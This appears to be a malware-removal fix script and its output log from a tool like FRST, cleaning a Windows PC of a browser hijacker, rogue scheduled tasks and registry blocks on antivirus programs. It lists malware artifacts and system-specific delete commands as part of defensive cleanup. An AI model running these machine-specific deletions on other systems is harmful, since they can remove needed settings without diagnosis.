FF HKLM\...\Firefox\Extensions: [{ABDE892B-13A8-4d1b-88E6-365A6E755758}] - C:\ProgramData\RealNetworks\RealDownloader\BrowserPlugins\Firefox\Ext => not found
FF HKLM\...\Firefox\Extensions: [[email protected]] - C:\Users\violeta\AppData\Roaming\okitspace\Firefox => not found
FF HKLM\...\Firefox\Extensions: [[email protected]] - C:\Program Files\WebexpEnhancedV1\WebexpEnhancedV1alpha842\ff => not found
FF HKLM\...\Firefox\Extensions: [[email protected]] - C:\Program Files\VideoPlayerV3\VideoPlayerV3beta322\ff => not found
FF Plugin: @mcafee.com/McAfeeMssPlugin -> C:\Program Files\McAfee Security Scan\3.8.141\npMcAfeeMss.dll [No File]
FF Plugin: @pandonetworks.com/PandoWebPlugin -> C:\Program Files\Pando Networks\Media Booster\npPandoWebPlugin.dll [No File]
FF Plugin: @real.com/nppl3260;version=16.0.2.32 -> C:\Program Files\Real\RealPlayer\Netscape6\nppl3260.dll [No File]
FF Plugin: @real.com/nprpplugin;version=16.0.2.32 -> C:\Program Files\Real\RealPlayer\Netscape6\nprpplugin.dll [No File]
FF Plugin HKU\S-1-5-21-3268508096-794200350-1188608446-1000: pandonetworks.com/PandoWebPlugin -> C:\Program Files\Pando Networks\Media Booster\npPandoWebPlugin.dll [No File]
CHR StartupUrls: Profile 1 -> "hxxp://www.google.com/","hxxp://www.sweet-page.com/?type=hp&ts=1434546381&z=ebb035f865ef946d91753c5g9z0c1zcw1zeq9c6bbz&from=cor&uid=WDCXWD5000AVVS-63H0B1_WD-WCAUK094765147651","hxxps://www.google.rs/"
CHR DefaultSearchURL: Profile 1 -> hxxp://www.sweet-page.com/web/?type=ds&ts=1434546381&z=ebb035f865ef946d91753c5g9z0c1zcw1zeq9c6bbz&from=cor&uid=WDCXWD5000AVVS-63H0B1_WD-WCAUK094765147651&q={searchTerms}
CHR DefaultSearchKeyword: Profile 1 -> sweet-page
CHR HKU\S-1-5-21-3268508096-794200350-1188608446-1000\SOFTWARE\Google\Chrome\Extensions\...\Chrome\Extension: [bhnddlaigdpagceekbpkajlgbnjbabig] - C:\Users\violeta\AppData\Local\CRE\bhnddlaigdpagceekbpkajlgbnjbabig.crx <not found>
U0 Partizan; C:\Windows\System32\drivers\Partizan.sys [40304 2016-03-12] (Greatis Software)
U3 am2liese; C:\Windows\system32\Drivers\am2liese.sys [0 ] (Microsoft Corporation) <==== ATTENTION (zero byte File/Folder)
C:\Windows\system32\Drivers\am2liese.sys
C:\ProgramData\hash.dat
C:\ProgramData\msdsrnwj.exe
c:\users\violeta\desktop\unhackme 7.80 build 480 + crack [4realtorrentz].zip
c:\users\violeta\desktop\sve sa desktopa\marijne stvari\rust\rust 14.03 cracked [derpteam].zip
c:\users\violeta\documents\spore\crack\rld-spor.exe
c:\users\violeta\music\violeta za budjenje\keygen.exe
C:\Windows\pss\McAfee Security Scan Plus.lnk.CommonStartup
C:\Users\violeta\AppData\LocalLow\uTorrent
C:\Users\violeta\AppData\Roaming\uTorrent
Zip: C:\Users\violeta\spopoi.exe
2016-10-16 08:56 - 2016-03-12 13:53 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\UnHackMe
2016-10-16 08:56 - 2016-03-12 13:53 - 00000000 ____D C:\Program Files\UnHackMe
Reg: reg delete "HKLM\SOFTWARE\Microsoft\Shared Tools\MSConfig\startupfolder\C:^Users^<username>^AppData^Roaming^Microsoft^Windows^Start Menu^Programs^Startup^McAfee Security Scan Plus.lnk" /f
Reg: reg delete "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Shared Tools\MSConfig\startupreg\uTorrent" /f
EmptyTemp:
end
*****************

Restore point was successfully created.
HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{C4ABDBC8-1C81-42C9-BFFC-4A68511E9E4F}\\SystemComponent => value removed successfully.
HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{A6F5703D-A4B1-4857-9EDD-DC0ABBBB0D96}\\SystemComponent => value removed successfully.
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Boot\{01835097-7B05-4094-B39B-A6F6BF09B715}" => key removed successfully.
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{01835097-7B05-4094-B39B-A6F6BF09B715}" => key removed successfully.
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\AdobeFlashPlayerUpdate 2" => key removed successfully.
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Plain\{05117A57-15BB-4310-AB94-ABEB78135006}" => key removed successfully.
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{05117A57-15BB-4310-AB94-ABEB78135006}" => key removed successfully.
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\{CFFDB85C-56BE-4D73-B744-97DB7D610B8E}" => key removed successfully.
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Plain\{0906990C-C047-4C7D-8D22-5255F1024FB3}" => key removed successfully.
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{0906990C-C047-4C7D-8D22-5255F1024FB3}" => key removed successfully.
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\{1E9494FA-6CA3-400B-B661-31837511C7EE}" => key removed successfully.
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Plain\{1C7306D1-9834-4D43-A2C5-FEFAE0216B5D}" => key removed successfully.
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{1C7306D1-9834-4D43-A2C5-FEFAE0216B5D}" => key removed successfully.
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\{3E27A315-206F-40D5-88C8-C29D09D3BAEB}" => key removed successfully.
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Plain\{258FDF9B-E6BF-4C1D-85FE-93C16438F4BE}" => key removed successfully.
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{258FDF9B-E6BF-4C1D-85FE-93C16438F4BE}" => key removed successfully.
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\RealPlayerRealUpgradeScheduledTaskS-1-5-21-3268508096-794200350-1188608446-1000" => key removed successfully.
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Plain\{334E8B80-9763-434E-8437-770A5DC4A520}" => key removed successfully.
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{334E8B80-9763-434E-8437-770A5DC4A520}" => key removed successfully.
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\20sve2tm" => key removed successfully.
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Plain\{39B9DF0B-CC67-48F1-A4C1-2BADF10A3AC3}" => key removed successfully.
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{39B9DF0B-CC67-48F1-A4C1-2BADF10A3AC3}" => key removed successfully.
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\{33C192B0-0851-4C18-BB29-6CDD784756BE}" => key removed successfully.
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Plain\{4D36E943-5B4B-417D-866E-E3F85BD73E06}" => key removed successfully.
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{4D36E943-5B4B-417D-866E-E3F85BD73E06}" => key removed successfully.
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\TuneUpUtilities_Task_BkGndMaintenance2013" => key removed successfully.
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Plain\{4E8A2AB5-82D2-4748-9188-0E52B2B4F655}" => key removed successfully.
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{4E8A2AB5-82D2-4748-9188-0E52B2B4F655}" => key removed successfully.
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\RsDelayLauncher_{8A34248E-7D35-4832-8378-7659E0B0A380}" => key removed successfully.
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Plain\{4F4C7C4A-4737-4F99-AF72-85BE3C1F13A4}" => key removed successfully.
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{4F4C7C4A-4737-4F99-AF72-85BE3C1F13A4}" => key removed successfully.
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\{F0E4F20A-26C0-4803-85F3-DE100A506A22}" => key removed successfully.
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Plain\{5E4FD528-665B-4BC7-92C3-FC3316142788}" => key removed successfully.
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{5E4FD528-665B-4BC7-92C3-FC3316142788}" => key removed successfully.
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\{CF0DA0CD-2FF5-454E-A86C-8C36A48353BC}" => key removed successfully.
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Plain\{694BC2C8-C491-43DE-BBE5-75891AEE91CB}" => key removed successfully.
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{694BC2C8-C491-43DE-BBE5-75891AEE91CB}" => key removed successfully.
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\{0EC195FB-14E3-4A02-B5E5-AAFFE238361D}" => key removed successfully.
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Plain\{72ACF684-33A4-45E8-ACB2-EAF73F1A890E}" => key removed successfully.
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{72ACF684-33A4-45E8-ACB2-EAF73F1A890E}" => key removed successfully.
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\{7BF7CA1C-3C80-4A51-B3A7-61A431253F64}" => key removed successfully.
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Logon\{74889F7C-185A-465F-8C1C-567D2DCC89F3}" => key removed successfully.
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{74889F7C-185A-465F-8C1C-567D2DCC89F3}" => key removed successfully.
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\pimofki" => key removed successfully.
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Plain\{7BD59BB0-7AB6-4C3F-86F5-EA01AB5F3279}" => key removed successfully.
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{7BD59BB0-7AB6-4C3F-86F5-EA01AB5F3279}" => key removed successfully.
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\fuwykpyf" => key removed successfully.
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Plain\{9810F01D-F471-42A3-B856-C40FC59F9803}" => key removed successfully.
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{9810F01D-F471-42A3-B856-C40FC59F9803}" => key removed successfully.
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\{8F1539C2-BC2A-4974-A0CC-92330EC7F6BF}" => key removed successfully.
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Plain\{9CBF7DD8-1CE8-4DCB-B923-DAF4E4701D7D}" => key removed successfully.
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{9CBF7DD8-1CE8-4DCB-B923-DAF4E4701D7D}" => key removed successfully.
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\{6DE94743-B83B-4B6B-90D4-3221A25A338C}" => key removed successfully.
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Plain\{9F201C7A-576B-4D43-8D9F-A4B54293FCEF}" => key removed successfully.
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{9F201C7A-576B-4D43-8D9F-A4B54293FCEF}" => key removed successfully.
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\{C5939251-AF8C-4222-AEE8-017F4EFC29BA}" => key removed successfully.
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Plain\{AF04095F-DCCD-4778-8E44-F5EBFFD2B929}" => key removed successfully.
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{AF04095F-DCCD-4778-8E44-F5EBFFD2B929}" => key removed successfully.
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\{F7D851AA-0D16-4E69-A250-0BBEFB60741F}" => key removed successfully.
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Plain\{B392518B-C4FB-46AB-97B9-C782DF67F093}" => key removed successfully.
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{B392518B-C4FB-46AB-97B9-C782DF67F093}" => key removed successfully.
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\{F05E8383-6A0D-4EC7-8387-45219DAF74DC}" => key removed successfully.
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Plain\{B4849F2D-8897-4812-B999-D27BD4E24928}" => key removed successfully.
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{B4849F2D-8897-4812-B999-D27BD4E24928}" => key removed successfully.
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\{0124643C-E010-44C2-9F26-76F3A357FEEC}" => key removed successfully.
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Plain\{C04DD09C-8E8F-4EFC-BA40-76E38C017EDF}" => key removed successfully.
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{C04DD09C-8E8F-4EFC-BA40-76E38C017EDF}" => key removed successfully.
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\{83496550-34D8-473D-9C5B-22447F85749B}" => key removed successfully.
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Plain\{C47C9F45-028F-489C-8034-E39D23DEF266}" => key removed successfully.
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{C47C9F45-028F-489C-8034-E39D23DEF266}" => key removed successfully.
C:\Windows\System32\Tasks\{04502F1C-86D9-4EA2-9C23-9BC3171C1BDD} => moved successfully
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\{04502F1C-86D9-4EA2-9C23-9BC3171C1BDD}" => key removed successfully.
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Plain\{C92C0B60-5D18-4764-96A6-F34DE2E15136}" => key removed successfully.
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{C92C0B60-5D18-4764-96A6-F34DE2E15136}" => key removed successfully.
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\AdobeFlashPlayerUpdate" => key removed successfully.
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Plain\{D0EEEA40-7CEF-4D6D-A553-DE1D49CBB4B8}" => key removed successfully.
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{D0EEEA40-7CEF-4D6D-A553-DE1D49CBB4B8}" => key removed successfully.
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\RealDownloaderDownloaderScheduledTaskS-1-5-21-3268508096-794200350-1188608446-1000" => key removed successfully.
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Plain\{D97EE862-AE54-469B-BEE3-B49B10A1B715}" => key removed successfully.
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{D97EE862-AE54-469B-BEE3-B49B10A1B715}" => key removed successfully.
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\{FCDC0ED4-0446-4695-8787-4841D69B92BC}" => key removed successfully.
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Plain\{DE7F472F-7147-4F3C-9A59-01F3BCF2BC5A}" => key removed successfully.
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{DE7F472F-7147-4F3C-9A59-01F3BCF2BC5A}" => key removed successfully.
C:\Windows\System32\Tasks\Norton Security Scan for violeta => moved successfully
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\Norton Security Scan for violeta" => key removed successfully.
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Plain\{E7ACA675-7025-4907-B741-CDA24CF6A000}" => key removed successfully.
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{E7ACA675-7025-4907-B741-CDA24CF6A000}" => key removed successfully.
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\{56AC13DC-CA7D-4BD2-B12C-8D196A5BA630}" => key removed successfully.
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Logon\{F170349C-A3EE-4B1E-B817-A0EB7254A9AA}" => key removed successfully.
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{F170349C-A3EE-4B1E-B817-A0EB7254A9AA}" => key removed successfully.
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\RealPlayerRealUpgradeLogonTaskS-1-5-21-3268508096-794200350-1188608446-1000" => key removed successfully.
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{FE5C0531-D94E-4827-9879-2EF8A4CF5047} => key not found.
C:\Windows\System32\Tasks\UnHackMe Task Scheduler => not found.
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\UnHackMe Task Scheduler => key not found.
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Plain\{FF8DA4BE-015F-43F0-92CE-F0CD9BF820F0}" => key removed successfully.
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{FF8DA4BE-015F-43F0-92CE-F0CD9BF820F0}" => key removed successfully.
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\{74CF8BF1-6DC8-411D-BEAF-22DAA4FEDFAF}" => key removed successfully.
C:\Windows\Tasks\Norton Security Scan for violeta.job => moved successfully
C:\Users\violeta\AppData\Local\Google\Chrome\User Data\Покретач Chrome апликација.lnk => moved successfully
C:\Users\violeta\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Google Chrome\Покретач Chrome апликација.lnk => moved successfully
C:\Users\violeta\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\GarrysMod\Start Garrysmod.lnk => moved successfully
C:\ProgramData\TEMP => ":373E1720" ADS removed successfully..
C:\ProgramData\TEMP => ":AD022376" ADS removed successfully..
HKLM\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\\HideSCAHealth => value removed successfully.
HKU\S-1-5-21-3268508096-794200350-1188608446-1000\Software\Microsoft\Windows\CurrentVersion\Run\\{57E0064B-6CDF-4014-A8FF-F401291F5488} => value removed successfully.
HKU\S-1-5-21-3268508096-794200350-1188608446-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows\\Load => value removed successfully.
"HKU\S-1-5-21-3268508096-794200350-1188608446-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\E" => key removed successfully.
"HKU\S-1-5-21-3268508096-794200350-1188608446-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\H" => key removed successfully.
"HKU\S-1-5-21-3268508096-794200350-1188608446-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{77b5a5be-29d4-11e1-ac3d-806e6f6e6963}" => key removed successfully.
HKCR\CLSID\{77b5a5be-29d4-11e1-ac3d-806e6f6e6963} => key not found.
"HKU\S-1-5-21-3268508096-794200350-1188608446-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c0d6b2af-2ab0-11e1-8970-6c626daeeb0d}" => key removed successfully.
HKCR\CLSID\{c0d6b2af-2ab0-11e1-8970-6c626daeeb0d} => key not found.
"HKU\S-1-5-21-3268508096-794200350-1188608446-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c5841f0c-20e0-11e6-8237-6c626daeeb0d}" => key removed successfully.
HKCR\CLSID\{c5841f0c-20e0-11e6-8237-6c626daeeb0d} => key not found.
"HKU\S-1-5-21-3268508096-794200350-1188608446-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{cd9f060b-2c6a-11e1-a88a-6c626daeeb0d}" => key removed successfully.
HKCR\CLSID\{cd9f060b-2c6a-11e1-a88a-6c626daeeb0d} => key not found.
"HKU\S-1-5-21-3268508096-794200350-1188608446-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{ed1d0150-29d4-11e1-b1db-6c626daeeb0d}" => key removed successfully.
HKCR\CLSID\{ed1d0150-29d4-11e1-b1db-6c626daeeb0d} => key not found.
"HKU\S-1-5-21-3268508096-794200350-1188608446-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{ed1d0177-29d4-11e1-b1db-6c626daeeb0d}" => key removed successfully.
HKCR\CLSID\{ed1d0177-29d4-11e1-b1db-6c626daeeb0d} => key not found.
"HKU\S-1-5-21-3268508096-794200350-1188608446-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{f4c05fa2-2a39-11e1-90e7-6c626daeeb0d}" => key removed successfully.
HKCR\CLSID\{f4c05fa2-2a39-11e1-90e7-6c626daeeb0d} => key not found.
"HKU\S-1-5-21-3268508096-794200350-1188608446-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{f4c05fad-2a39-11e1-90e7-6c626daeeb0d}" => key removed successfully.
HKCR\CLSID\{f4c05fad-2a39-11e1-90e7-6c626daeeb0d} => key not found.
HKU\S-1-5-18\Software\Microsoft\Windows\CurrentVersion\RunOnce\\SpUninstallDeleteDir => value removed successfully.
HKU\S-1-5-18\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\\HideSCAHealth => value removed successfully.
"HKLM\Software\microsoft\windows nt\currentversion\Image File Execution Options\AvastSvc.exe" => key removed successfully.
"HKLM\Software\microsoft\windows nt\currentversion\Image File Execution Options\AvastUI.exe" => key removed successfully.
"HKLM\Software\microsoft\windows nt\currentversion\Image File Execution Options\avcenter.exe" => key removed successfully.
"HKLM\Software\microsoft\windows nt\currentversion\Image File Execution Options\avconfig.exe" => key removed successfully.
"HKLM\Software\microsoft\windows nt\currentversion\Image File Execution Options\avgcsrvx.exe" => key removed successfully.
"HKLM\Software\microsoft\windows nt\currentversion\Image File Execution Options\avgidsagent.exe" => key removed successfully.
"HKLM\Software\microsoft\windows nt\currentversion\Image File Execution Options\avgnt.exe" => key removed successfully.
"HKLM\Software\microsoft\windows nt\currentversion\Image File Execution Options\avgrsx.exe" => key removed successfully.
"HKLM\Software\microsoft\windows nt\currentversion\Image File Execution Options\avguard.exe" => key removed successfully.
"HKLM\Software\microsoft\windows nt\currentversion\Image File Execution Options\avgui.exe" => key removed successfully.
"HKLM\Software\microsoft\windows nt\currentversion\Image File Execution Options\avgwdsvc.exe" => key removed successfully.
"HKLM\Software\microsoft\windows nt\currentversion\Image File Execution Options\avp.exe" => key removed successfully.
"HKLM\Software\microsoft\windows nt\currentversion\Image File Execution Options\avscan.exe" => key removed successfully.
"HKLM\Software\microsoft\windows nt\currentversion\Image File Execution Options\bdagent.exe" => key removed successfully.
"HKLM\Software\microsoft\windows nt\currentversion\Image File Execution Options\ccuac.exe" => key removed successfully.
"HKLM\Software\microsoft\windows nt\currentversion\Image File Execution Options\ComboFix.exe" => key removed successfully.
"HKLM\Software\microsoft\windows nt\currentversion\Image File Execution Options\coreFrameworkHost.exe" => key removed successfully.
"HKLM\Software\microsoft\windows nt\currentversion\Image File Execution Options\coreServiceShell.exe" => key removed successfully.
"HKLM\Software\microsoft\windows nt\currentversion\Image File Execution Options\egui.exe" => key removed successfully.
"HKLM\Software\microsoft\windows nt\currentversion\Image File Execution Options\hijackthis.exe" => key removed successfully.
"HKLM\Software\microsoft\windows nt\currentversion\Image File Execution Options\instup.exe" => key removed successfully.
"HKLM\Software\microsoft\windows nt\currentversion\Image File Execution Options\keyscrambler.exe" => key removed successfully.
"HKLM\Software\microsoft\windows nt\currentversion\Image File Execution Options\mbam.exe" => key removed successfully.
"HKLM\Software\microsoft\windows nt\currentversion\Image File Execution Options\mbamgui.exe" => key removed successfully.
"HKLM\Software\microsoft\windows nt\currentversion\Image File Execution Options\mbampt.exe" => key removed successfully.
"HKLM\Software\microsoft\windows nt\currentversion\Image File Execution Options\mbamscheduler.exe" => key removed successfully.
"HKLM\Software\microsoft\windows nt\currentversion\Image File Execution Options\mbamservice.exe" => key removed successfully.
"HKLM\Software\microsoft\windows nt\currentversion\Image File Execution Options\MpCmdRun.exe" => key removed successfully.
"HKLM\Software\microsoft\windows nt\currentversion\Image File Execution Options\MSASCui.exe" => key removed successfully.
"HKLM\Software\microsoft\windows nt\currentversion\Image File Execution Options\MsMpEng.exe" => key removed successfully.
"HKLM\Software\microsoft\windows nt\currentversion\Image File Execution Options\msseces.exe" => key removed successfully.
"HKLM\Software\microsoft\windows nt\currentversion\Image File Execution Options\rstrui.exe" => key removed successfully.
"HKLM\Software\microsoft\windows nt\currentversion\Image File Execution Options\spybotsd.exe" => key removed successfully.
"HKLM\Software\microsoft\windows nt\currentversion\Image File Execution Options\SSScheduler.exe" => key removed successfully.
"HKLM\Software\microsoft\windows nt\currentversion\Image File Execution Options\TuneUpUtilitiesApp32.exe" => key removed successfully.
"HKLM\Software\microsoft\windows nt\currentversion\Image File Execution Options\TuneUpUtilitiesService32.exe" => key removed successfully.
"HKLM\Software\microsoft\windows nt\currentversion\Image File Execution Options\uiSeAgnt.exe" => key removed successfully.
"HKLM\Software\microsoft\windows nt\currentversion\Image File Execution Options\uiWatchDog.exe" => key removed successfully.
"HKLM\Software\microsoft\windows nt\currentversion\Image File Execution Options\wireshark.exe" => key removed successfully.
"HKLM\Software\microsoft\windows nt\currentversion\Image File Execution Options\zlclient.exe" => key removed successfully.
"HKLM\Software\Microsoft\Windows\CurrentVersion\Explorer\ShellIconOverlayIdentifiers\###MegaShellExtPending" => key removed successfully.
HKCR\CLSID\{056D528D-CE28-4194-9BA3-BA2E9197FF8C} => key not found.
"HKLM\Software\Microsoft\Windows\CurrentVersion\Explorer\ShellIconOverlayIdentifiers\###MegaShellExtSynced" => key removed successfully.
HKCR\CLSID\{05B38830-F4E9-4329-978B-1DD28605D202} => key not found.
"HKLM\Software\Microsoft\Windows\CurrentVersion\Explorer\ShellIconOverlayIdentifiers\###MegaShellExtSyncing" => key removed successfully.
HKCR\CLSID\{0596C850-7BDD-4C9D-AFDF-873BE6890637} => key not found.
C:\Users\violeta\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Registration RAYMAN => moved successfully
"HKLM\SOFTWARE\Policies\Google" => key removed successfully.
"HKLM\SYSTEM\CurrentControlSet\Services\WinSock2\Parameters\NameSpace_Catalog5\Catalog_Entries\000000000009" => key removed successfully.
HKU\S-1-5-21-3268508096-794200350-1188608446-1000\Software\Microsoft\Internet Explorer\Main\\SearchAssistant => value removed successfully.
Could not restore Default URLSearchHook.
HKU\.DEFAULT\SOFTWARE\Microsoft\Internet Explorer\SearchScopes\\DefaultScope => value removed successfully.
"HKU\.DEFAULT\SOFTWARE\Microsoft\Internet Explorer\SearchScopes\{0ECDF796-C2DC-4d79-A620-CCE0C0A66CC9}" => key removed successfully.
